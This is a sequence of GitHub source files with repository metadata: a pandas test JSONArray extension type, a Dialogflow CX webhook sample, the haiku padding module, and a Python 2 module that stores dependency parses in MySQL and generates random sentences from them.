    return features[0], labels[0], features[1], labels[1]
| {
"content_hash": "8715f898d799f60fcc5d7016b83d6031",
"timestamp": "",
"source": "github",
"line_count": 34,
"max_line_length": 70,
"avg_line_length": 28.705882352941178,
"alnum_prop": 0.6495901639344263,
"repo_name": "GoogleCloudPlatform/ml-pipeline-generator-python",
"id": "a400cc66126034f4ba1868bda6bd52c31da80cf5",
"size": "1583",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ml_pipeline_gen/templates/xgboost_inputs.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "2104"
},
{
"name": "Jupyter Notebook",
"bytes": "5880"
},
{
"name": "Python",
"bytes": "99482"
},
{
"name": "Shell",
"bytes": "6738"
}
],
"symlink_target": ""
} |
"""Test extension array for storing nested data in a pandas container.
The JSONArray stores lists of dictionaries. The storage mechanism is a list,
not an ndarray.
Note:
We currently store lists of UserDicts (Py3 only). Pandas has a few places
internally that specifically check for dicts, and does non-scalar things
in that case. We *want* the dictionaries to be treated as scalars, so we
hack around pandas by using UserDicts.
"""
import collections
import itertools
import numbers
import random
import string
import sys
import numpy as np
from pandas.core.dtypes.base import ExtensionDtype
from pandas import compat
from pandas.core.arrays import ExtensionArray
class JSONDtype(ExtensionDtype):
    """Extension dtype whose scalar type is any mapping (dict-like)."""

    name = 'json'
    type = compat.Mapping
    # UserDict exists only on Py3; fall back to a plain dict on Py2.
    try:
        na_value = collections.UserDict()
    except AttributeError:
        na_value = {}

    @classmethod
    def construct_array_type(cls):
        """Return the array type associated with this dtype

        Returns
        -------
        type
        """
        return JSONArray

    @classmethod
    def construct_from_string(cls, string):
        if string != cls.name:
            raise TypeError("Cannot construct a '{}' from "
                            "'{}'".format(cls, string))
        return cls()
class JSONArray(ExtensionArray):
    """ExtensionArray storing dict-like scalars in a plain Python list.

    Storage is a list (self.data), not an ndarray, because NumPy mangles
    sequences of dicts during shape inference (see take/_values_for_argsort).
    """

    dtype = JSONDtype()
    __array_priority__ = 1000

    def __init__(self, values, dtype=None, copy=False):
        # Every element must be a mapping (the dtype's scalar type).
        for val in values:
            if not isinstance(val, self.dtype.type):
                raise TypeError("All values must be of type " +
                                str(self.dtype.type))
        self.data = values

        # Some aliases for common attribute names to ensure pandas supports
        # these
        self._items = self._data = self.data
        # those aliases are currently not working due to assumptions
        # in internal code (GH-20735)
        # self._values = self.values = self.data

    @classmethod
    def _from_sequence(cls, scalars, dtype=None, copy=False):
        """Construct from a sequence of mapping scalars."""
        return cls(scalars)

    @classmethod
    def _from_factorized(cls, values, original):
        # Values are the frozen item-tuples from _values_for_factorize;
        # the empty tuple is the sentinel/NA marker and is dropped.
        return cls([collections.UserDict(x) for x in values if x != ()])

    def __getitem__(self, item):
        if isinstance(item, numbers.Integral):
            # Scalar lookup returns the raw dict-like value.
            return self.data[item]
        elif isinstance(item, np.ndarray) and item.dtype == 'bool':
            # Boolean mask.
            return self._from_sequence([x for x, m in zip(self, item) if m])
        elif isinstance(item, compat.Iterable):
            # fancy indexing
            return type(self)([self.data[i] for i in item])
        else:
            # slice
            return type(self)(self.data[item])

    def __setitem__(self, key, value):
        if isinstance(key, numbers.Integral):
            self.data[key] = value
        else:
            if not isinstance(value, (type(self),
                                      compat.Sequence)):
                # broadcast value
                value = itertools.cycle([value])

            if isinstance(key, np.ndarray) and key.dtype == 'bool':
                # masking
                for i, (k, v) in enumerate(zip(key, value)):
                    if k:
                        assert isinstance(v, self.dtype.type)
                        self.data[i] = v
            else:
                for k, v in zip(key, value):
                    assert isinstance(v, self.dtype.type)
                    self.data[k] = v

    def __len__(self):
        return len(self.data)

    @property
    def nbytes(self):
        # Shallow size of the backing list only (getsizeof does not
        # follow references into the stored dicts).
        return sys.getsizeof(self.data)

    def isna(self):
        """Boolean ndarray marking elements equal to the dtype's NA value."""
        return np.array([x == self.dtype.na_value for x in self.data],
                        dtype=bool)

    def take(self, indexer, allow_fill=False, fill_value=None):
        # re-implement here, since NumPy has trouble setting
        # sized objects like UserDicts into scalar slots of
        # an ndarary.
        indexer = np.asarray(indexer)
        msg = ("Index is out of bounds or cannot do a "
               "non-empty take from an empty array.")

        if allow_fill:
            if fill_value is None:
                fill_value = self.dtype.na_value
            # bounds check
            if (indexer < -1).any():
                raise ValueError
            try:
                # -1 is the "missing" marker and maps to fill_value.
                output = [self.data[loc] if loc != -1 else fill_value
                          for loc in indexer]
            except IndexError:
                raise IndexError(msg)
        else:
            try:
                output = [self.data[loc] for loc in indexer]
            except IndexError:
                raise IndexError(msg)

        return self._from_sequence(output)

    def copy(self, deep=False):
        # Shallow copy of the backing list; the dicts themselves are shared.
        return type(self)(self.data[:])

    def astype(self, dtype, copy=True):
        # NumPy has issues when all the dicts are the same length.
        # np.array([UserDict(...), UserDict(...)]) fails,
        # but np.array([{...}, {...}]) works, so cast.
        # needed to add this check for the Series constructor
        if isinstance(dtype, type(self.dtype)) and dtype == self.dtype:
            if copy:
                return self.copy()
            return self
        return np.array([dict(x) for x in self], dtype=dtype, copy=copy)

    def unique(self):
        # Parent method doesn't work since np.array will try to infer
        # a 2-dim object.
        return type(self)([
            dict(x) for x in list({tuple(d.items()) for d in self.data})
        ])

    @classmethod
    def _concat_same_type(cls, to_concat):
        """Concatenate several JSONArrays into one."""
        data = list(itertools.chain.from_iterable([x.data for x in to_concat]))
        return cls(data)

    def _values_for_factorize(self):
        frozen = self._values_for_argsort()
        if len(frozen) == 0:
            # _factorize_array expects 1-d array, this is a len-0 2-d array.
            frozen = frozen.ravel()
        return frozen, ()

    def _values_for_argsort(self):
        # Disable NumPy's shape inference by including an empty tuple...
        # If all the elemnts of self are the same size P, NumPy will
        # cast them to an (N, P) array, instead of an (N,) array of tuples.
        frozen = [()] + [tuple(x.items()) for x in self]
        return np.array(frozen, dtype=object)[1:]
def make_data():
    """Return 100 random UserDicts mapping ascii letters to small ints."""
    # TODO: Use a regular dict. See _NDFrameIndexer._setitem_with_indexer
    records = []
    for _ in range(100):
        n_pairs = random.randint(0, 10)
        pairs = []
        for _ in range(n_pairs):
            key = random.choice(string.ascii_letters)
            value = random.randint(0, 100)
            pairs.append((key, value))
        records.append(collections.UserDict(pairs))
    return records
| {
"content_hash": "505e79f030b647fb1b893d6bae2a1a11",
"timestamp": "",
"source": "github",
"line_count": 199,
"max_line_length": 79,
"avg_line_length": 33.06532663316583,
"alnum_prop": 0.5737082066869301,
"repo_name": "GuessWhoSamFoo/pandas",
"id": "10fd21f89c5641b7e73e7bef609b3938d932230d",
"size": "6580",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "pandas/tests/extension/json/array.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "4879"
},
{
"name": "C",
"bytes": "406353"
},
{
"name": "C++",
"bytes": "17193"
},
{
"name": "HTML",
"bytes": "606963"
},
{
"name": "Makefile",
"bytes": "556"
},
{
"name": "Python",
"bytes": "14926624"
},
{
"name": "Shell",
"bytes": "29351"
},
{
"name": "Smarty",
"bytes": "2040"
}
],
"symlink_target": ""
} |
""" handle_webhook will return the correct fullfilment response dependong the tag that is sent in the request"""
# [START dialogflow_cx_webhook]
# TODO(developer): change entry point to handle_webhook in cloud function
def handle_webhook(request):
req = request.get_json()
tag = req["fulfillmentInfo"]["tag"]
if tag == "Default Welcome Intent":
text = "Hello from a GCF Webhook"
elif tag == "get-name":
text = "My name is Flowhook"
else:
text = f"There are no fulfillment responses defined for {tag} tag"
# You can also use the google.cloud.dialogflowcx_v3.types.WebhookRequest protos instead of manually writing the json object
# Please see https://googleapis.dev/python/dialogflow/latest/dialogflow_v2/types.html?highlight=webhookresponse#google.cloud.dialogflow_v2.types.WebhookResponse for an overview
res = {
"fulfillment_response": {
"messages": [
{
"text": {
"text": [
text
]
}
}
]
}
}
# Returns json
return res
# [END dialogflow_cx_webhook]
| {
"content_hash": "e5e0b9eba86fdd564b4d8322a21ec9a8",
"timestamp": "",
"source": "github",
"line_count": 40,
"max_line_length": 180,
"avg_line_length": 30.375,
"alnum_prop": 0.5851851851851851,
"repo_name": "googleapis/python-dialogflow-cx",
"id": "516000cd45f6d19ff6eed65bb21529022c5cd393",
"size": "1788",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "samples/snippets/webhook.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "2050"
},
{
"name": "Python",
"bytes": "10904903"
},
{
"name": "Shell",
"bytes": "30681"
}
],
"symlink_target": ""
} |
"""Paddings."""
from haiku._src.pad import causal
from haiku._src.pad import create_from_padfn
from haiku._src.pad import create_from_tuple
from haiku._src.pad import full
from haiku._src.pad import is_padfn
from haiku._src.pad import PadFn
from haiku._src.pad import reverse_causal
from haiku._src.pad import same
from haiku._src.pad import valid
create = create_from_padfn # Legacy alias.
__all__ = (
"PadFn",
"causal",
"create",
"create_from_padfn",
"create_from_tuple",
"full",
"is_padfn",
"reverse_causal",
"same",
"valid",
)
| {
"content_hash": "3971a20b5c96fdb84870d0a2407d9d2f",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 44,
"avg_line_length": 22.115384615384617,
"alnum_prop": 0.671304347826087,
"repo_name": "deepmind/dm-haiku",
"id": "d2a84aaaf509b733cf96c77151b29b22a2bace90",
"size": "1308",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "haiku/pad.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "1024855"
},
{
"name": "Shell",
"bytes": "1907"
},
{
"name": "Starlark",
"bytes": "31643"
}
],
"symlink_target": ""
} |
import random
try:
import nltk.data
except Exception as e:
print "cannot import nltk"
import copy
import client
try:
import corenlp
except Exception as e:
print "cannot import corenlp"
import time
from unidecode import unidecode
import database
import rewrite_rules as rr
import depend_tree as deptree
class SentenceBuilderErr(Exception):
    """Error raised when sentence generation cannot proceed.

    Fix: this type is raised elsewhere in the file
    (`raise SentenceBuilderErr(...)`) but previously did not subclass
    Exception; deriving from Exception makes raising/catching it
    well-defined while keeping str() output unchanged.
    """

    def __init__(self, err):
        Exception.__init__(self, err)
        # Keep the raw payload for callers that inspect .err directly.
        self.err = err

    def __str__(self):
        return "SentenceBuilderErr(%s)" % self.err
class ExpansionNode:
    """One frontier node of the random sentence-expansion search."""

    def __init__(self, word, arctype, sid, did, height, fixed_sib):
        self.word = word
        self.arctype = arctype
        self.sid = sid
        self.did = did
        self.height = height
        self.fixed_siblings = fixed_sib

    def __str__(self):
        template = ("ExpansionNode(word = %s, arctype = %s, sid = %s, "
                    "did = %s, height = %s, fixed_sibling = %s)")
        return template % (self.word, self.arctype, self.sid, self.did,
                           self.height, self.fixed_siblings)
# Scales how strongly tree depth dampens expansion probability
# (used via DEFAULT_PARAMS["height_throttler"] in SubsetSelector).
HEIGHT_THROTTLER = 1.0
# Per-arctype probability of swapping in a random alternative dependant
# during expansion; commented-out entries appear to be disabled experiments.
ARC_WILDNESS = {
    "amod" : 0.5,
#    "num" : 0.5,
    "iobj" : 0.5,
    "dobj" : 0.5,
#    "vmod" : 0.5,
#    "rcmod" : 0.2,
#    "pobj" : 0.5,
#    "quantmod" : 0.5,
    "nsubj" : 0.5,
#    "nsubjpass" : 0.5,
#    "csubj" : 0.25,
#    "number" : 0.5
}
# Default knobs consumed by SubsetSelector.
DEFAULT_PARAMS = {
    "height_throttler" : HEIGHT_THROTTLER,
    "arc_wildness" : ARC_WILDNESS
}
# Module-level StanfordNLP client, created lazily by InitNLP.
NLP = None


def InitNLP():
    """Create the shared StanfordNLP client the first time it is needed."""
    global NLP
    if NLP is not None:
        return
    NLP = client.StanfordNLP()
def Print(x):
    # Default logging callback (Python 2 print statement); functions below
    # accept a log= parameter so callers can substitute their own sink.
    print x
def Test(sentence, verbose=False, transforms=[], exempt=[]):
    """Round-trip a sentence through parse -> DependTree -> text and assert
    the reconstruction matches; then recursively test each transform.

    NOTE(review): transforms/exempt are mutable default arguments -- callers
    appear to always pass their own lists, but worth confirming.
    """
    print sentence
    global NLP
    InitNLP()
    dt = deptree.ToDependTree(NLP.parse(sentence)["sentences"][0]["dependencies"], "ROOT-0")
    print dt
    result = deptree.FromDependTree(copy.deepcopy(dt), verbose=verbose, printres=True)
    # Reconstruction must match the input modulo trailing punctuation.
    assert result == sentence.strip(".").strip("!"), "\n%s\n%s" % (result, sentence)
    for arc, tg in transforms:
        if arc in exempt:
            continue
        dtcopy = copy.deepcopy(dt)
        if dtcopy.Transform(arc, tg):
            result = deptree.FromDependTree(dtcopy, verbose=verbose, printres=False)
            # Recursively verify the transformed sentence also round-trips.
            Test(result, verbose=verbose)
    print
def Reset(con, user):
    """Drop all of this user's tables and recreate them empty via DDL."""
    for suffix in ("dependencies", "sentences", "procd"):
        con.query("drop table %s_%s" % (user, suffix))
    DDL(con, user)
def DDL(con, user):
    """Create the per-user tables in the tiaraboom database if absent."""
    con.query("use tiaraboom")
    # Raw dependency arcs, one row per (sentence, dependant).
    con.query(("create table if not exists %s_dependencies"
               "(sentence_id bigint not null"
               ",arctype varbinary(255) not null"
               ",governor varbinary(255) not null"
               ",dependant varbinary(255) not null"
               ",governor_id int not null"
               ",dependant_id int not null"
               ",primary key(sentence_id,dependant_id)"
               ")") % user)
    # Post-processed arcs; sharded and indexed for generation-time lookups.
    con.query(("create table if not exists %s_procd"
               "(sentence_id bigint not null"
               ",arctype varbinary(255) not null"
               ",governor varbinary(255) not null"
               ",dependant varbinary(255) not null"
               ",governor_id int not null"
               ",dependant_id int not null"
               ",primary key(sentence_id,dependant_id)"
               ",shard(sentence_id)"
               ",key(arctype, governor, dependant)"
               ")") % user)
    # Original sentence text (and optional source) keyed by auto-increment id.
    con.query(("create table if not exists %s_sentences"
               "(id bigint primary key auto_increment"
               ",sentence blob"
               ",source blob default null)") % user)
def UpdateProcd(con, user):
    """Rebuild the _procd table from every stored sentence."""
    con.query("drop table %s_procd" % user)
    DDL(con, user)
    ids = [int(r["id"]) for r in con.query("select id from %s_sentences" % user)]
    for i in xrange(len(ids)):
        # Progress report every 100 sentences.
        if i % 100 == 0:
            print "%f%% done" % (100*float(i)/len(ids))
        ix = ids[i]
        PostProcessSentence(con, ix, user)
def PostProcessSentence(con, i, user):
    """Flatten sentence i's preprocessed dependency tree into _procd rows."""
    procd = deptree.FlattenDependTree(deptree.PreProcessDependTree(SentenceIdDependTree(user, i, con)))
    if len(procd) == 0:
        return
    # Build a single multi-row insert: numeric fields and arctype are
    # inlined, the two word fields go through query parameters.
    q = "insert into %s_procd values" % user
    params = []
    for p in procd:
        q += "(%d, '%s', %%s, %%s, %d, %d)," % (i, p[0], p[2], p[4])
        params.append(p[1])
        params.append(p[3])
    q = q.strip(",")
    try:
        con.query(q, *params)
    except Exception as e:
        # Dump the failing statement for debugging, then re-raise.
        print q
        print params
        print i
        raise e
def InsertSentence(con, user, sentence):
    """Parse one sentence with the StanfordNLP client and store its arcs."""
    # Word values are passed as query parameters downstream, not spliced
    # into SQL text.
    sentence = sentence.encode("utf8")
    global NLP
    print sentence
    if NLP is None:
        InitNLP()
    # Parser only handles ascii; drop anything it can't represent.
    nlp_parsed = NLP.parse(sentence.decode("utf8").encode("ascii","ignore"))
    depsa = nlp_parsed["sentences"]
    ProcessDependencies(con, user, depsa)
def ProcessDependencies(con, user, depsa, source=None, log=Print):
    """Store each parsed sentence and its dependency arcs for this user.

    depsa is a CoreNLP "sentences" list. Failures are handled per sentence:
    a failed arc insert deletes that sentence's rows and moves on (logged,
    not raised).
    """
    for deps in depsa:
        txt = deps["text"].encode("utf8")
        try:
            if source is None:
                sid = str(con.execute("insert into %s_sentences(sentence) values(%%s)" % (user), txt))
            else:
                sid = str(con.execute("insert into %s_sentences(sentence,source) values(%%s,%%s)" % (user), txt, unidecode(source)))
        except Exception as e:
            log("insert sentence error " + str(e))
            continue
        deps = deps["dependencies"]
        failed = False
        for at, gv, dp in deps:
            # Numeric word-position ids are inlined; the word strings are
            # bound as parameters (lowercased, utf8-encoded).
            values = [sid, "'%s'" % at, "%s", "%s", deptree.remove_word(gv), deptree.remove_word(dp)]
            q = "insert into %s_dependencies values (%s)" % (user,",".join(values))
            try:
                con.query(q.encode("utf8"),
                          deptree.remove_id(gv).lower().encode("utf8"),
                          deptree.remove_id(dp).lower().encode("utf8"))
            except Exception as e:
                log("insert dep error " + str(e))
                log("%s %s %s" % (q.encode("utf8"),
                                  deptree.remove_id(gv).lower().encode("utf8"),
                                  deptree.remove_id(dp).lower().encode("utf8")))
                # Manual rollback: remove the sentence and any arcs already
                # inserted for it.
                con.query("delete from %s_sentences where id = %s" % (user,sid))
                con.query("delete from %s_dependencies where sentence_id = %s" % (user,sid))
                failed = True
                break
        if not failed:
            PostProcessSentence(con, int(sid), user)
def Ingest(con, text, user):
    """Split raw text into sentences with NLTK and insert each one."""
    splitter = nltk.data.load('tokenizers/punkt/english.pickle')
    for sent in splitter.tokenize(text.decode("utf8")):
        InsertSentence(con, user, sent)
def IngestFile(con, filename, user, log=Print):
    """Parse filename with CoreNLP and ingest it inside one transaction."""
    parsed = corenlp.ParseAndSaveFile(filename)
    log("begin xact")
    con.query("begin")
    try:
        ProcessDependencies(con, user, parsed["sentences"], filename, log=log)
        log("commit xact")
        con.query("commit")
    except Exception:
        # Undo the partial ingest, then surface the original error.
        con.query("rollback")
        raise
def RandomWeightedChoice(choices):
    """Pick one value from [(value, weight)] with probability ~ weight."""
    total_weight = sum(weight for _, weight in choices)
    threshold = random.uniform(0, total_weight)
    cumulative = 0
    for value, weight in choices:
        cumulative += weight
        if cumulative > threshold:
            return value
    # Should be unreachable barring float rounding at the upper edge.
    assert False, ("RandomWeightedChoice", choices)
def Subset(superset, subset):
    """Multiset containment: every element of subset occurs at least as
    often in superset."""
    return all(superset.count(elem) >= subset.count(elem)
               for elem in set(subset))
# this function find a all sentences containing a given word under a given arctype
# for each fixed sibling, the toplevel arctype will be present.
# the return type is [([(arctype, word)], sentence_id, dependant_id)]
#
def HistogramSubsets(con, node, user):
    """Find candidate child-arc sets for node.word (optionally restricted to
    node.arctype) that contain all of node's fixed siblings.

    Returns [([(arctype, word)], sentence_id, dependant_id)].
    """
    word = node.word
    parent_arctype = node.arctype
    fixed_siblings = node.fixed_siblings
    # For every occurrence of the word, collect its children's arcs/words
    # concatenated per (sentence, position) via group_concat.
    subs = ("select dl.sentence_id as sid, dl.dependant_id as did, "
            "group_concat(dr.arctype separator '___') as gc_arc, "
            "group_concat(dr.dependant separator '___') as gc_dep, "
            "count(dr.dependant) as groupsize "
            "from %s_procd dl left join %s_procd dr "
            "on dl.sentence_id = dr.sentence_id and dl.dependant_id = dr.governor_id "
            "where dl.dependant = %%s %s "
            "group by dl.sentence_id, dl.dependant_id ")
    extra_cond = ""
    params = [word]
    if not parent_arctype is None:
        extra_cond += ("and dl.arctype = '%s'" % parent_arctype)
    subs = subs % (user, user, extra_cond)
    q = subs
    t0 = time.time()
    qres = con.query(q, *params)
    maxgroupsize = max([int(r["groupsize"]) for r in qres])
    # If the word is always a leaf, one representative row is enough.
    if maxgroupsize == 0:
        qres = [qres[0]]
    t1 = time.time()
    hists = [( ([] if r["gc_arc"] is None else r["gc_arc"].split("___")),
               ([] if r["gc_dep"] is None else r["gc_dep"].split("___")),
               r["sid"],
               r["did"])
             for r in qres]
    disallowed = ["cc"]
    disallowed.extend(["num","number"]) # this will add some stability for now...
    if len(hists) == 0:
        raise SentenceBuilderErr("before filtering no rows")
    result = []
    assert fixed_siblings.data is None
    fixed_tups = [(fs[0], fs[1].data) for fs in fixed_siblings.children]
    t2 = time.time()
    for h in hists:
        assert len(h[0]) == len(h[1]), h
        # Keep only arc sets without disallowed arcs, at most one nsubj,
        # and containing every fixed sibling (multiset containment).
        if len([x for x in h[0] if x in disallowed]) == 0 and len([x for x in h[0] if x == "nsubj"]) < 2:
            zipd = zip(h[0],h[1])
            if Subset(zipd, fixed_tups):
                result.append((zipd, h[2], h[3]))
    return result
# returns [(arctype, word, fixed_arcs)]
def SubsetSelector(con, node, user, dbg_out, symbols):
    """Sample one child-arc set for node and materialize its ExpansionNodes.

    Weighting penalizes large arc sets (more so at greater depth) and bumps
    sets containing requested symbols; some children are then randomly
    replaced by wilder alternatives per ARC_WILDNESS.
    """
    if 'facts' not in dbg_out:
        dbg_out['facts'] = []
    params = DEFAULT_PARAMS
    hist = HistogramSubsets(con, node=node, user=user)
    if len(hist) == 0:
        raise SentenceBuilderErr("generated no rows, word = %s, \nfixed=%s" % (node.word, str(node.fixed_siblings)))
    for i in xrange(len(hist)):
        # Weight ~ 1/denom: larger arc sets (and deeper nodes) are less likely.
        denom = float(len(hist[i][0])) if node.height == 0 else (params["height_throttler"] * float(node.height))**len(hist[i][0])
        hist[i] = (hist[i], 0 if denom == 0 else (1.0/denom))
        for s,k in symbols.iteritems():
            if s in [hr[1] for hr in hist[i][0][0]]:
                dbg_out['facts'].append("Bumped %s by %f" % (s,4+k))
                hist[i] = (hist[i][0], hist[i][1]*(4+k))
    result_entry = RandomWeightedChoice(hist)
    q = "select * from %s_procd where sentence_id = %s and governor_id = %s" % (user, result_entry[1], result_entry[2])
    result = [ExpansionNode(r["dependant"],
                            r["arctype"],
                            r["sentence_id"],
                            r["dependant_id"],
                            node.height+1,
                            deptree.DependTree(None))
              for r in con.query(q)]
    # NOTE(review): the assert message has four %s but only two arguments --
    # if this assert ever fires it will raise TypeError instead.
    assert sorted([(r.arctype,r.word) for r in result]) == sorted(result_entry[0]), "%s\n%s\n%s\n%s" % (result,result_entry)
    if "used_list" not in dbg_out:
        dbg_out["used_list"] = []
    if len(result) != 0:
        dbg_out["used_list"].append(int(result_entry[1]))
    fixed_ixs = set([])
    for at,fs in node.fixed_siblings.children:
        found = False
        for i in xrange(len(result)):
            if (result[i].arctype,result[i].dependant) == (at,fs.data):
                fixed_ixs.add(i)
                # NOTE(review): sets `fixed_sibling` (singular) but
                # ExpansionNode/HistogramSubsets read `fixed_siblings` --
                # looks like fixed-sibling propagation is broken; confirm.
                result[i].fixed_sibling = deptree.DependTree(None, fs.children)
                found = True
                break
        assert found, ("not found",at,fs.data,result)
    for i in xrange(len(result)):
        # Randomly swap some children for alternative dependants, but never
        # the ones pinned by fixed siblings.
        if result[i].arctype in params["arc_wildness"] and random.random() < params["arc_wildness"][result[i].arctype]:
            if i not in fixed_ixs:
                next_word = RandomDependant(con, user, node.word, result[i].arctype, symbols=symbols)
                dbg_out['facts'].append(result[i].word +"->"+next_word)
                result[i].word = next_word
                # A symbol that just got placed no longer needs bumping.
                if result[i].word in symbols:
                    del symbols[result[i].word]
    return result
def GetDependants(con, user, sentence_id, gov_id):
    """List (arctype, dependant) pairs governed by gov_id in one sentence."""
    q = ("select arctype, dependant from %s_procd "
         "where governor_id = %%s and sentence_id = %%s") % user
    rows = con.query(q, gov_id, sentence_id)
    return [(row["arctype"], row["dependant"]) for row in rows]
def RandomDependant(con, user, gov, arctype, symbols={}):
    """Pick a random dependant of gov under arctype, biased toward symbols.

    A symbol already among the candidates gets 2 + int(rate) extra copies,
    raising its selection odds proportionally.
    """
    q = "select dependant from %s_procd where governor = %%s and arctype = %%s" % user
    candidates = [row['dependant'] for row in con.query(q, gov, arctype)]
    for sym, rate in symbols.iteritems():
        if sym not in candidates:
            continue
        candidates.extend([sym] * (2 + int(rate)))
    return random.choice(candidates)
def Expand(con, node, user, dbg_out, symbols):
    """Recursively grow a DependTree below node by sampling child arcs."""
    children = SubsetSelector(con, node, user=user, dbg_out=dbg_out, symbols=symbols)
    subtrees = [(child.arctype,
                 Expand(con, node=child, user=user, dbg_out=dbg_out, symbols=symbols))
                for child in children]
    return deptree.DependTree(node.word, subtrees, node.sid, node.did)
# SeekToRoot :: dependant -> fixed_tree
def SeekToRoot(con, user, dependant):
    """Walk a random governor chain from dependant up to 'root' and return
    it as a single-path DependTree (root's word at the top, data=None there
    is later stripped by the caller). Returns DependTree(None) when the
    word is unknown.
    """
    result = []
    q = (("select governor, arctype from %s_procd "
          "where dependant = %%s"))
    q = q % user
    rows = con.query(q, dependant.encode("utf8"))
    if len(rows) == 0:
        return deptree.DependTree(None)
    row = random.choice(rows)
    result.append((row["arctype"], dependant))
    dependant = row['governor']
    while dependant != 'root':
        # Find a concrete (sentence, governor position) realizing the last
        # chosen arc, then look up that governor's own parent arc.
        q = (("select sentence_id as sid, governor_id as gid from %s_procd "
              "where arctype = '%s' and governor = %%s and dependant = %%s"))
        q = q % (user, result[-1][0])
        rows = con.query(q, dependant, result[-1][1])
        assert len(rows) != 0
        row = random.choice(rows)
        rows = con.query("select governor, arctype from %s_procd where sentence_id = %s and dependant_id = %s" % (user, row["sid"], row["gid"]))
        assert len(rows) == 1, ("SeekToRoot", rows)
        result.append((rows[0]['arctype'], dependant))
        dependant = rows[0]['governor']
    # Fold the chain bottom-up into a nested single-child tree.
    result_tree = []
    for at, dep in result:
        result_tree = [(at, deptree.DependTree(dep, result_tree))]
    assert result_tree[0][0] == 'root', ("SeekToRoot", result_tree)
    return result_tree[0][1]
# Last tree produced by Generate, kept for post-mortem debugging.
g_last_generated = None


def Generate(con, user, using=None, dbg_out={}, symbols={}):
    """Generate a random dependency tree, optionally forced to contain the
    word `using` (by anchoring on a random path from it to root).

    Returns None when `using` is unknown to the corpus.

    NOTE(review): dbg_out/symbols are mutable default arguments -- callers
    here always pass their own dicts, but worth confirming.
    """
    if not using is None:
        fixed_chain = SeekToRoot(con, user, using)
        if fixed_chain.data is None:
            return None
        word = fixed_chain.data
        # The chain's root word becomes the expansion seed; its node data is
        # cleared because fixed-sibling trees carry None at the top.
        fixed_chain.data = None
    else:
        fixed_chain = deptree.DependTree(None)
        word = random.choice(con.query("select dependant from %s_procd where arctype = 'root'" % user))['dependant']
    global g_last_generated
    node = ExpansionNode(word, 'root', -1, -1, 0, fixed_chain)
    result = Expand(con, node=node, user=user, dbg_out=dbg_out, symbols=symbols)
    g_last_generated = copy.deepcopy(result)
    return result
def GenerateAndExpand(user, using=None):
    """Generate a sentence tree for `user` and flatten it for display."""
    con = database.ConnectToMySQL()
    con.query("use tiaraboom")
    dbg_out = { "used_list" : [] }
    result = deptree.FromDependTree(Generate(con, user, using=using,dbg_out=dbg_out))
    # NOTE(review): "facts" is assumed to be added to dbg_out by Expand —
    # confirm, otherwise the second print raises KeyError.
    print "sentences_used" , dbg_out["used_list"]
    print "facts" , dbg_out["facts"]
    print g_last_generated
    return result
def GenerateWithSymbols(con, user, symbols, requireSymbols=False):
    """Try to build a sentence anchored on one of `symbols`.

    `symbols` maps candidate anchor words to weights. Anchors are tried in
    weighted random order; on success returns (tree, used_word). When all
    anchors fail, either raises (requireSymbols=True) or falls back to an
    unconstrained sentence and returns (tree, None).
    """
    symbols = { k.encode("utf8") : v for k,v in symbols.iteritems() }
    while len(symbols) != 0:
        # Draw one anchor word and remove it so each is tried at most once.
        using = RandomWeightedChoice(symbols.items())
        del symbols[using]
        dbg_out = { "used_list" : [] }
        result = Generate(con, user, using, symbols=copy.copy(symbols), dbg_out=dbg_out)
        # NOTE(review): assumes Generate fills dbg_out["facts"] — confirm.
        print dbg_out["facts"]
        if not result is None:
            return result, using
    if requireSymbols:
        raise Exception("cannot build sentence with provided symbols")
    result = Generate(con, user, None)
    return result, None
def SentenceIdDependTree(user,sid, con):
    """Fetch sentence `sid`'s arcs from the database and rebuild its tree."""
    rows = con.query("select arctype, governor, dependant, governor_id, dependant_id from %s_dependencies where sentence_id = %d" % (user,sid))
    arcs = []
    for row in rows:
        governor = row['governor'] + "-" + row['governor_id']
        dependant = row['dependant'] + "-" + row['dependant_id']
        arcs.append((row["arctype"], governor, dependant))
    return deptree.ToDependTree(arcs, root='root-0')
def PrintSentences(user,sids):
    """Print every sentence in `sids` for the given user (debug aid)."""
    for sentence_id in sids:
        PrintSentence(user, sentence_id)
def PrintSentence(user,sid):
    """Print sentence `sid`'s raw text and its dependency tree (debug aid)."""
    con = database.ConnectToMySQL()
    con.query("use tiaraboom")
    print con.query("select * from %s_sentences where id = %d" % (user,sid))[0]['sentence']
    print SentenceIdDependTree(user,sid, con)
def GetImportantWords(parsetree, nlp):
    """Score the salient words of a parsed sentence.

    The root word gets 1 point, its nsubj/dobj children 3 points each, and
    every named entity from the NLP annotation 10 points; scores for the
    same word accumulate.

    Args:
        parsetree: a dependency tree exposing Find/FindNoCheck/Child/ChildStr.
        nlp: CoreNLP-style dict; nlp["words"] is a list of (word, attrs).

    Returns:
        Dict mapping each important word to its score.
    """
    def _bump(scores, word, amount):
        # Accumulate into the score dict, initializing missing words to 0.
        scores[word] = scores.get(word, 0) + amount

    root = parsetree.Child(parsetree.Find("root"))
    result = {root.data: 1}
    # Subject and direct object, when present, are weighted equally.
    for arc in ("nsubj", "dobj"):
        child = root.FindNoCheck(arc)
        if child is not None:
            _bump(result, root.ChildStr(child), 3)
    for w, mw in nlp["words"]:
        if mw["NamedEntityTag"] != 'O':
            _bump(result, w, 10)
    return result
# NOTE(review): TestAll is not defined in this portion of the file —
# confirm it is defined earlier in the module.
if __name__ == "__main__":
    TestAll()
| {
"content_hash": "9645a4ea083c415cfb6f21cbcf537747",
"timestamp": "",
"source": "github",
"line_count": 457,
"max_line_length": 190,
"avg_line_length": 38.29978118161926,
"alnum_prop": 0.5772153345140832,
"repo_name": "jvictor0/TiaraBoom",
"id": "c0b329239fdeeda3a0d990e5a48384274c545410",
"size": "17503",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "artrat/sentence_builder.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "155700"
},
{
"name": "HTML",
"bytes": "2378"
},
{
"name": "Haskell",
"bytes": "9532"
},
{
